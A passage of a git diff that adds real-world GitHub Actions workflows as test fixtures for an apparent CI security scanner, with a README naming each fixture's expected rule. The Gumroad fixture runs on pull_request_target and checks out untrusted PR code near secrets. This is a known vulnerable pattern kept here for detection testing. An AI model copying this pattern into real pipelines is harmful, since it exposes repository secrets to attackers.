`test-fixtures/workflow-audits/real-cases/RC-08-workflow-secret-exfiltration/.github/workflows/db-pro.yaml` + +9. `RC-09-workflow-oidc-untrusted-context` + +- Expected rule: `workflow-oidc-untrusted-context` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-09-workflow-oidc-untrusted-context/.github/workflows/frontend-lint.yml` + +10. 
`RC-10-dependabot-auto-merge` + +- Expected rule: `dependabot-auto-merge` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-10-dependabot-auto-merge/.github/workflows/dependabot-auto-merge.yml` + +11. `RC-11-workflow-local-action-mutation` + +- Expected rule: `workflow-local-action-mutation` +- Source: +- Local file: `test-fixtures/workflow-audits/real-cases/RC-11-workflow-local-action-mutation/.github/workflows/frontend-lint.yml` + ## Validation Run targeted test: @@ -48,5 +90,5 @@ npm test -- tests/layer2/workflow-real-cases.test.ts Run CLI manually: ```bash -codegate scan test-fixtures/workflow-audits/real-cases/RC-02-obfuscation --workflow-audits --no-tui --format json +codegate scan test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain --workflow-audits --no-tui --format json ``` diff --git a/test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml b/test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml new file mode 100644 index 0000000..a8f3c17 --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-05-workflow-pr-target-checkout-head/.github/workflows/tests.yml @@ -0,0 +1,509 @@ +name: Tests + +on: + push: + branches: + - "**" + tags-ignore: + - "production-*" + pull_request_target: + +permissions: + contents: read + +concurrency: + group: ${{ github.workflow }}-${{ github.event_name == 'pull_request_target' && github.event.pull_request.number || github.ref }} + cancel-in-progress: ${{ github.event_name == 'pull_request_target' || github.ref != 'refs/heads/main' }} + +jobs: + ci_gate: + name: CI Gate${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + runs-on: ubicloud-standard-2 + environment: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name != 
github.repository && 'ci-protected' || '' }} + steps: + - run: true + + build_base: + name: Build base image${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + runs-on: ubicloud-standard-4 + needs: ci_gate + if: ${{ github.event_name != 'pull_request_target' || github.event.pull_request.head.repo.full_name != github.repository }} + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + persist-credentials: false + - name: Login to Quay + uses: nick-fields/retry@v3 + with: + timeout_seconds: 120 + max_attempts: 3 + retry_wait_seconds: 10 + command: echo "$QUAY_PASSWORD" | docker login quay.io -u "$QUAY_USERNAME" --password-stdin + env: + QUAY_USERNAME: ${{ secrets.QUAY_USERNAME }} + QUAY_PASSWORD: ${{ secrets.QUAY_PASSWORD }} + - name: Build and push base image + env: + WEB_BASE_REPO: quay.io/gumroad/web_base + run: | + set -e + GREEN='\033[0;32m' + NC='\033[0m' + logger() { + echo -e "${GREEN}$(date '+%Y/%m/%d %H:%M:%S') build.sh: $1${NC}" + } + logger "pulling quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye" + docker pull --quiet quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye + WEB_BASE_SHA=$(WEB_BASE_DOCKERFILE_FROM=quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye docker/base/generate_tag_for_web_base.sh) + if ! 
docker manifest inspect $WEB_BASE_REPO:$WEB_BASE_SHA > /dev/null 2>&1; then + logger "Building $WEB_BASE_REPO:$WEB_BASE_SHA" + NEW_BASE_REPO=$WEB_BASE_REPO \ + WEB_BASE_DOCKERFILE_FROM=quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye \ + BUNDLE_GEMS__CONTRIBSYS__COM=${{ secrets.BUNDLE_GEMS__CONTRIBSYS__COM }} \ + make build_base + + logger "Pushing $WEB_BASE_REPO:$WEB_BASE_SHA" + for i in {1..3}; do + logger "Push attempt $i" + if docker push --quiet $WEB_BASE_REPO:$WEB_BASE_SHA; then + logger "Pushed $WEB_BASE_REPO:$WEB_BASE_SHA" + break + elif [ $i -eq 3 ]; then + logger "Failed to push $WEB_BASE_REPO:$WEB_BASE_SHA" + exit 1 + else + sleep 5 + fi + done + else + logger "$WEB_BASE_REPO:$WEB_BASE_SHA already exists" + fi + + build_test: + runs-on: ubicloud-standard-4 + name: Build test image${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + needs: build_base + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + persist-credentials: false + - name: Login to Quay + uses: nick-fields/retry@v3 + with: + timeout_seconds: 120 + max_attempts: 3 + retry_wait_seconds: 10 + command: echo "$QUAY_PASSWORD" | docker login quay.io -u "$QUAY_USERNAME" --password-stdin + env: + QUAY_USERNAME: ${{ secrets.QUAY_USERNAME }} + QUAY_PASSWORD: ${{ secrets.QUAY_PASSWORD }} + - name: Build and push test image + env: + WEB_BASE_REPO: quay.io/gumroad/web_base + WEB_BASE_TEST_REPO: quay.io/gumroad/web_base_test + WEB_REPO: quay.io/gumroad/web + REVISION: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + run: | + set -e + GREEN='\033[0;32m' + NC='\033[0m' + logger() { + echo -e "${GREEN}$(date '+%Y/%m/%d %H:%M:%S') build.sh: $1${NC}" + } + docker pull --quiet quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye + 
WEB_BASE_TEST_SHA=$(WEB_BASE_DOCKERFILE_FROM=quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye docker/base/generate_tag_for_web_base_test.sh) + build_and_push() { + local repo=$1 + local tag=$2 + local make_target=$3 + if ! docker manifest inspect $repo:$tag > /dev/null 2>&1; then + logger "building $repo:$tag" + NEW_BASE_REPO=$WEB_BASE_REPO NEW_WEB_BASE_TEST_REPO=$WEB_BASE_TEST_REPO NEW_WEB_REPO=$WEB_REPO \ + WEB_BASE_DOCKERFILE_FROM=quay.io/gumroad/ruby:$(cat .ruby-version)-slim-bullseye \ + BRANCH_CACHE_UPLOAD_ENABLED=false \ + BRANCH_CACHE_RESTORE_ENABLED=false \ + NEW_WEB_TAG=$REVISION \ + COMPOSE_PROJECT_NAME=web_${{ github.run_id }}_${{ github.run_attempt }} \ + make $make_target + logger "pushing $repo:$tag" + for i in {1..3}; do + logger "Push attempt $i" + if docker push --quiet $repo:$tag; then + logger "Pushed $repo:$tag" + break + elif [ $i -eq 3 ]; then + logger "Failed to push $repo:$tag" + exit 1 + else + sleep 5 + fi + done + else + logger "$repo:$tag already exists" + fi + } + + build_and_push $WEB_BASE_TEST_REPO $WEB_BASE_TEST_SHA build_base_test + build_and_push $WEB_REPO test-$REVISION build_test + + test_fast: + name: Test Fast ${{ matrix.ci_node_index }}${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + env: + COMPOSE_PROJECT_NAME: web_${{ github.run_id }}_${{ github.run_attempt }}_fast_${{ matrix.ci_node_index }} + runs-on: ubicloud-standard-4 + needs: build_test + strategy: + fail-fast: false + matrix: + ci_node_total: [15] + ci_node_index: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14] + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + persist-credentials: false + - name: Login to Quay + uses: nick-fields/retry@v3 + with: + timeout_seconds: 120 + max_attempts: 3 + retry_wait_seconds: 10 + command: echo "$QUAY_PASSWORD" | 
docker login quay.io -u "$QUAY_USERNAME" --password-stdin + env: + QUAY_USERNAME: ${{ secrets.QUAY_USERNAME }} + QUAY_PASSWORD: ${{ secrets.QUAY_PASSWORD }} + - name: Start services + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 10 + command: docker compose -f docker/docker-compose-test-and-ci.yml up -d + env: + COMPOSE_HTTP_TIMEOUT: "300" + - name: Wait for services + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 5 + command: | + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh db_test 3306 + + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh elasticsearch 9200 + + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh minio 9000 + env: + WEB_REPO: quay.io/gumroad/web + - name: Setup test database + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 10 + command: | + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + -e RAILS_ENV=test \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + bundle exec rake db:setup + env: + WEB_REPO: quay.io/gumroad/web + + - name: Run tests + env: + WEB_REPO: quay.io/gumroad/web + KNAPSACK_PRO_BRANCH: ${{ github.event_name == 'pull_request_target' && github.head_ref || github.ref_name }} + run: | + docker run --rm --entrypoint="" 
--network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + -e RUBY_YJIT_ENABLE=1 \ + -e KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC=${{ secrets.KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC_FAST }} \ + -e KNAPSACK_PRO_CI_NODE_TOTAL=${{ matrix.ci_node_total }} \ + -e KNAPSACK_PRO_CI_NODE_INDEX=${{ matrix.ci_node_index }} \ + -e KNAPSACK_PRO_LOG_LEVEL=info \ + -e KNAPSACK_PRO_RSPEC_SPLIT_BY_TEST_EXAMPLES=true \ + -e KNAPSACK_PRO_TEST_FILE_PATTERN="spec/**/*_spec.rb" \ + -e KNAPSACK_PRO_TEST_FILE_EXCLUDE_PATTERN="spec/requests/**/*_spec.rb" \ + -e KNAPSACK_PRO_COMMIT_HASH=${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + -e KNAPSACK_PRO_BRANCH="$KNAPSACK_PRO_BRANCH" \ + -e KNAPSACK_PRO_CI_NODE_BUILD_ID=${{ github.run_id }} \ + -e KNAPSACK_PRO_CI_NODE_RETRY_COUNT=${{ github.run_attempt }} \ + -e KNAPSACK_PRO_PROJECT_DIR=/app \ + -e KNAPSACK_PRO_FIXED_QUEUE_SPLIT=true \ + -e CI=true \ + -e IN_DOCKER=true \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + /usr/local/bin/gosu app bundle exec rake "knapsack_pro:queue:rspec[--format RSpec::Github::Formatter --tag ~skip --format progress]" + timeout-minutes: 15 + - name: Clean up + if: always() + run: | + docker compose -f docker/docker-compose-test-and-ci.yml down -v 2>/dev/null || true + docker rm -f $(docker ps -aq -f name=${{ env.COMPOSE_PROJECT_NAME }}) 2>/dev/null || true + docker volume rm $(docker volume ls -q -f name=${{ env.COMPOSE_PROJECT_NAME }}) 2>/dev/null || true + docker network rm ${{ env.COMPOSE_PROJECT_NAME }}_default 2>/dev/null || true + + test_slow: + name: Test Slow ${{ matrix.ci_node_index }}${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.repo.full_name == github.repository && ' (internal PR noop)' || '' }} + env: + COMPOSE_PROJECT_NAME: web_${{ github.run_id }}_${{ github.run_attempt }}_slow_${{ matrix.ci_node_index }} + WEB_REPO: quay.io/gumroad/web + runs-on: 
ubicloud-standard-4 + needs: build_test + strategy: + fail-fast: false + matrix: + ci_node_total: [45] + ci_node_index: + [ + 0, + 1, + 2, + 3, + 4, + 5, + 6, + 7, + 8, + 9, + 10, + 11, + 12, + 13, + 14, + 15, + 16, + 17, + 18, + 19, + 20, + 21, + 22, + 23, + 24, + 25, + 26, + 27, + 28, + 29, + 30, + 31, + 32, + 33, + 34, + 35, + 36, + 37, + 38, + 39, + 40, + 41, + 42, + 43, + 44, + ] + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + persist-credentials: false + - name: Login to Quay + uses: nick-fields/retry@v3 + with: + timeout_seconds: 120 + max_attempts: 3 + retry_wait_seconds: 10 + command: echo "$QUAY_PASSWORD" | docker login quay.io -u "$QUAY_USERNAME" --password-stdin + env: + QUAY_USERNAME: ${{ secrets.QUAY_USERNAME }} + QUAY_PASSWORD: ${{ secrets.QUAY_PASSWORD }} + - name: Start services + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 10 + command: docker compose -f docker/docker-compose-test-and-ci.yml up -d + env: + COMPOSE_HTTP_TIMEOUT: "300" + - name: Wait for services + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 5 + command: | + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh db_test 3306 + + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + docker/ci/wait_on_connection.sh elasticsearch 9200 + + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + 
docker/ci/wait_on_connection.sh minio 9000 + env: + WEB_REPO: quay.io/gumroad/web + - name: Setup test database + uses: nick-fields/retry@v3 + with: + timeout_minutes: 5 + max_attempts: 3 + retry_wait_seconds: 10 + command: | + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + -e RAILS_ENV=test \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + bundle exec rake db:setup + env: + WEB_REPO: quay.io/gumroad/web + + - name: Run tests + env: + RUBY_YJIT_ENABLE: 1 + KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC: ${{ secrets.KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC_FAST }} + KNAPSACK_PRO_CI_NODE_TOTAL: ${{ matrix.ci_node_total }} + KNAPSACK_PRO_CI_NODE_INDEX: ${{ matrix.ci_node_index }} + KNAPSACK_PRO_LOG_LEVEL: info + KNAPSACK_PRO_RSPEC_SPLIT_BY_TEST_EXAMPLES: true + KNAPSACK_PRO_TEST_FILE_PATTERN: "spec/requests/**/*_spec.rb" + KNAPSACK_PRO_COMMIT_HASH: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + KNAPSACK_PRO_BRANCH: ${{ github.event_name == 'pull_request_target' && github.head_ref || github.ref_name }} + KNAPSACK_PRO_CI_NODE_BUILD_ID: ${{ github.run_id }} + KNAPSACK_PRO_CI_NODE_RETRY_COUNT: ${{ github.run_attempt }} + KNAPSACK_PRO_PROJECT_DIR: /app + KNAPSACK_PRO_FIXED_QUEUE_SPLIT: true + CI: true + IN_DOCKER: true + WEB_REPO: quay.io/gumroad/web + run: | + # Create local directory for artifacts + mkdir -p ./capybara-artifacts + chmod 777 ./capybara-artifacts + mkdir -p ./test-logs + chmod 777 ./test-logs + + # Run tests with volume mount to capture capybara artifacts and test logs + docker run --rm --entrypoint="" --network ${{ env.COMPOSE_PROJECT_NAME }}_default \ + -v "$(pwd)/capybara-artifacts:/app/tmp/capybara" \ + -v "$(pwd)/test-logs:/app/log" \ + -e RUBY_YJIT_ENABLE \ + -e KNAPSACK_PRO_TEST_SUITE_TOKEN_RSPEC \ + -e KNAPSACK_PRO_CI_NODE_TOTAL \ + -e KNAPSACK_PRO_CI_NODE_INDEX \ + -e KNAPSACK_PRO_LOG_LEVEL \ + 
-e KNAPSACK_PRO_RSPEC_SPLIT_BY_TEST_EXAMPLES \ + -e KNAPSACK_PRO_TEST_FILE_PATTERN \ + -e KNAPSACK_PRO_COMMIT_HASH \ + -e KNAPSACK_PRO_BRANCH \ + -e KNAPSACK_PRO_CI_NODE_BUILD_ID \ + -e KNAPSACK_PRO_CI_NODE_RETRY_COUNT \ + -e KNAPSACK_PRO_PROJECT_DIR \ + -e KNAPSACK_PRO_FIXED_QUEUE_SPLIT \ + -e CI \ + -e IN_DOCKER \ + $WEB_REPO:test-${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} \ + /usr/local/bin/gosu app bundle exec rake "knapsack_pro:queue:rspec[--format RSpec::Github::Formatter --tag ~skip --format progress]" + timeout-minutes: 20 + - name: Archive capybara artifacts + if: failure() + uses: actions/upload-artifact@v4 + with: + name: capybara-screenshots-slow-${{ matrix.ci_node_index }}-attempt-${{ github.run_attempt }} + path: ./capybara-artifacts/*.png + retention-days: 7 + if-no-files-found: ignore + - name: Archive test logs + if: failure() + uses: actions/upload-artifact@v4 + with: + name: test-logs-slow-${{ matrix.ci_node_index }}-attempt-${{ github.run_attempt }} + path: ./test-logs/test.log + retention-days: 7 + if-no-files-found: ignore + - name: Clean up + if: always() + run: | + docker compose -f docker/docker-compose-test-and-ci.yml down -v 2>/dev/null || true + docker rm -f $(docker ps -aq -f name=${{ env.COMPOSE_PROJECT_NAME }}) 2>/dev/null || true + docker volume rm $(docker volume ls -q -f name=${{ env.COMPOSE_PROJECT_NAME }}) 2>/dev/null || true + docker network rm ${{ env.COMPOSE_PROJECT_NAME }}_default 2>/dev/null || true + + unblock_deployment_from_buildkite: + name: Unblock deployment from Buildkite + runs-on: ubicloud-standard-2 + needs: [test_fast, test_slow] + if: success() && github.event_name == 'push' && github.ref == 'refs/heads/main' + steps: + - name: Unblock corresponding Buildkite build + uses: nick-fields/retry@v3 + with: + timeout_seconds: 20 + retry_wait_seconds: 300 + max_attempts: 3 + command: | + if [ "$UNBLOCK_DEPLOYMENT" != "true" ]; then + echo 
"UNBLOCK_DEPLOYMENT_FROM_BUILDKITE is not set to 'true'. Skipping unblock." + exit 0 + fi + + echo "Looking for Buildkite build for commit $COMMIT_SHA on pipeline $ORG_SLUG/$PIPELINE_SLUG..." + # Fetch builds for the specific commit, including jobs + BUILD_DATA=$(curl -s -H "Authorization: Bearer $BUILDKITE_API_TOKEN" \ + "https://api.buildkite.com/v2/organizations/$ORG_SLUG/pipelines/$PIPELINE_SLUG/builds?commit=$COMMIT_SHA&include_retried_jobs=true") + + # Extract the latest build number that is currently blocked for this commit + BUILD_NUMBER=$(echo "$BUILD_DATA" | jq -r --arg commit "$COMMIT_SHA" '[.[] | select(.commit == $commit and .blocked == true)] | sort_by(.created_at) | last | .number // empty') + + if [ -z "$BUILD_NUMBER" ]; then + echo "No blocked Buildkite build found for commit $COMMIT_SHA on pipeline $ORG_SLUG/$PIPELINE_SLUG." + exit 1 + fi + + echo "Found blocked Buildkite build number: $BUILD_NUMBER. Fetching job details..." + # Fetch detailed data for the specific build to get job IDs + BUILD_DETAIL_DATA=$(curl -s -H "Authorization: Bearer $BUILDKITE_API_TOKEN" \ + "https://api.buildkite.com/v2/organizations/$ORG_SLUG/pipelines/$PIPELINE_SLUG/builds/$BUILD_NUMBER") + + # Extract the job ID for the block step with key "require-approval" + BLOCK_JOB_ID=$(echo "$BUILD_DETAIL_DATA" | jq -r '.jobs[] | select(.type == "manual" and .step_key == "require-approval") | .id // empty') + + if [ -z "$BLOCK_JOB_ID" ]; then + echo "No block job with key 'require-approval' found in build $BUILD_NUMBER." + exit 1 + fi + + echo "Found block job ID: $BLOCK_JOB_ID for build $BUILD_NUMBER. Attempting to unblock job..." 
+ # Send the unblock request using PUT to the job-specific endpoint + RESPONSE_CODE=$(curl -s -o /dev/null -w "%{http_code}" -X PUT \ + -H "Authorization: Bearer $BUILDKITE_API_TOKEN" \ + -H "Content-Type: application/json" \ + -d '{}' \ + "https://api.buildkite.com/v2/organizations/$ORG_SLUG/pipelines/$PIPELINE_SLUG/builds/$BUILD_NUMBER/jobs/$BLOCK_JOB_ID/unblock") + + # Check the response code + if [ "$RESPONSE_CODE" -ge 200 ] && [ "$RESPONSE_CODE" -lt 300 ]; then + echo "Successfully sent unblock request for job $BLOCK_JOB_ID in build $BUILD_NUMBER. Response code: $RESPONSE_CODE" + else + echo "Error sending unblock request for job $BLOCK_JOB_ID in build $BUILD_NUMBER. Response code: $RESPONSE_CODE" + # Attempt to fetch error details from Buildkite if available + ERROR_DETAILS=$(curl -s -H "Authorization: Bearer $BUILDKITE_API_TOKEN" \ + "https://api.buildkite.com/v2/organizations/$ORG_SLUG/pipelines/$PIPELINE_SLUG/builds/$BUILD_NUMBER/jobs/$BLOCK_JOB_ID") + echo "API Response details for failed unblock: $ERROR_DETAILS" + exit 1 # Exit with error if the API call failed + fi + env: + UNBLOCK_DEPLOYMENT: ${{ secrets.UNBLOCK_DEPLOYMENT_FROM_BUILDKITE }} + BUILDKITE_API_TOKEN: ${{ secrets.BUILDKITE_API_TOKEN }} + COMMIT_SHA: ${{ github.event_name == 'pull_request_target' && github.event.pull_request.head.sha || github.sha }} + ORG_SLUG: gumroad-inc + PIPELINE_SLUG: ${{ secrets.BUILDKITE_PIPELINE_SLUG }} diff --git a/test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml b/test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml new file mode 100644 index 0000000..f4b914a --- /dev/null +++ b/test-fixtures/workflow-audits/real-cases/RC-06-workflow-artifact-trust-chain/.github/workflows/runtime_build_and_test.yml @@ -0,0 +1,933 @@ +name: (Runtime) Build and Test + +on: + push: + branches: [main] + tags: + # To get CI for backport releases. 
+ # This will duplicate CI for releases from main which is acceptable + - "v*" + pull_request: + paths-ignore: + - compiler/** + workflow_dispatch: + inputs: + commit_sha: + required: false + type: string + default: "" + +permissions: {} + +concurrency: + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.event.pull_request.number || github.run_id }} + cancel-in-progress: true + +env: + TZ: /usr/share/zoneinfo/America/Los_Angeles + # https://github.com/actions/cache/blob/main/tips-and-workarounds.md#cache-segment-restore-timeout + SEGMENT_DOWNLOAD_TIMEOUT_MINS: 1 + +jobs: + # ----- NODE_MODULES CACHE ----- + # Centralize the node_modules cache so it is saved once and each subsequent job only needs to + # restore the cache. Prevents race conditions where multiple workflows try to write to the cache. + runtime_node_modules_cache: + name: Cache Runtime node_modules + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - name: Check cache hit + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + lookup-only: true + - uses: actions/setup-node@v4 + if: steps.node_modules.outputs.cache-hit != 'true' + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Warm with old cache + if: steps.node_modules.outputs.cache-hit != 'true' + uses: actions/cache/restore@v4 + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. 
+ - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Save cache + if: steps.node_modules.outputs.cache-hit != 'true' + uses: actions/cache/save@v4 + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + + runtime_compiler_node_modules_cache: + name: Cache Runtime, Compiler node_modules + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - name: Check cache hit + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + lookup-only: true + - uses: actions/setup-node@v4 + if: steps.node_modules.outputs.cache-hit != 'true' + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: | + yarn.lock + compiler/yarn.lock + - name: Warm with old cache + if: steps.node_modules.outputs.cache-hit != 'true' + uses: actions/cache/restore@v4 + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. 
+ - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn --cwd compiler install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - name: Save cache + if: steps.node_modules.outputs.cache-hit != 'true' + uses: actions/cache/save@v4 + with: + path: | + **/node_modules + key: runtime-and-compiler-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock', 'compiler/yarn.lock') }} + + # ----- FLOW ----- + discover_flow_inline_configs: + name: Discover flow inline configs + runs-on: ubuntu-latest + outputs: + matrix: ${{ steps.set-matrix.outputs.result }} + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/github-script@v7 + id: set-matrix + with: + script: | + const inlinedHostConfigs = require('./scripts/shared/inlinedHostConfigs.js'); + return inlinedHostConfigs.map(config => config.shortName); + + flow: + name: Flow check ${{ matrix.flow_inline_config_shortname }} + needs: [discover_flow_inline_configs, runtime_node_modules_cache] + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + flow_inline_config_shortname: ${{ fromJSON(needs.discover_flow_inline_configs.outputs.matrix) }} + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. 
+ - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: node ./scripts/tasks/flow-ci ${{ matrix.flow_inline_config_shortname }} + + # ----- FIZZ ----- + check_generated_fizz_runtime: + name: Confirm generated inline Fizz runtime is up to date + needs: [runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + # Don't use restore-keys here. Otherwise the cache grows indefinitely. + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: | + yarn generate-inline-fizz-runtime + git diff --exit-code || (echo "There was a change to the Fizz runtime. Run \`yarn generate-inline-fizz-runtime\` and check in the result." 
&& false) + + # ----- FEATURE FLAGS ----- + flags: + name: Check flags + needs: [runtime_node_modules_cache] + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v4 + with: + ref: ${{ github.event.inputs.commit_sha != '' && github.event.inputs.commit_sha || github.event.pull_request.head.sha || github.sha }} + - uses: actions/setup-node@v4 + with: + node-version-file: ".nvmrc" + cache: yarn + cache-dependency-path: yarn.lock + - name: Restore cached node_modules + uses: actions/cache/restore@v4 + id: node_modules + with: + path: | + **/node_modules + key: runtime-node_modules-v7-${{ runner.arch }}-${{ runner.os }}-${{ hashFiles('yarn.lock') }} + - name: Ensure clean build directory + run: rm -rf build + - run: yarn install --frozen-lockfile + if: steps.node_modules.outputs.cache-hit != 'true' + - run: yarn flags + + # ----- TESTS ----- + test: + name: yarn test ${{ matrix.params }} (Shard ${{ matrix.shard }}) + needs: [runtime_compiler_node_modules_cache] + runs-on: ubuntu-latest + strategy: + fail-fast: false + matrix: + params: + - "-r=stable --env=development" + - "-r=stable --env=production" + - "-r=experimental --env=development" + - "-r=experimental --env=production" + - "-r=www-classic --env=development --variant=false" + - "-r=www-classic --env=production --variant=false" + - "-r=www-classic --env=development --variant=true" + - "-r=www-classic --env=production --variant=true" 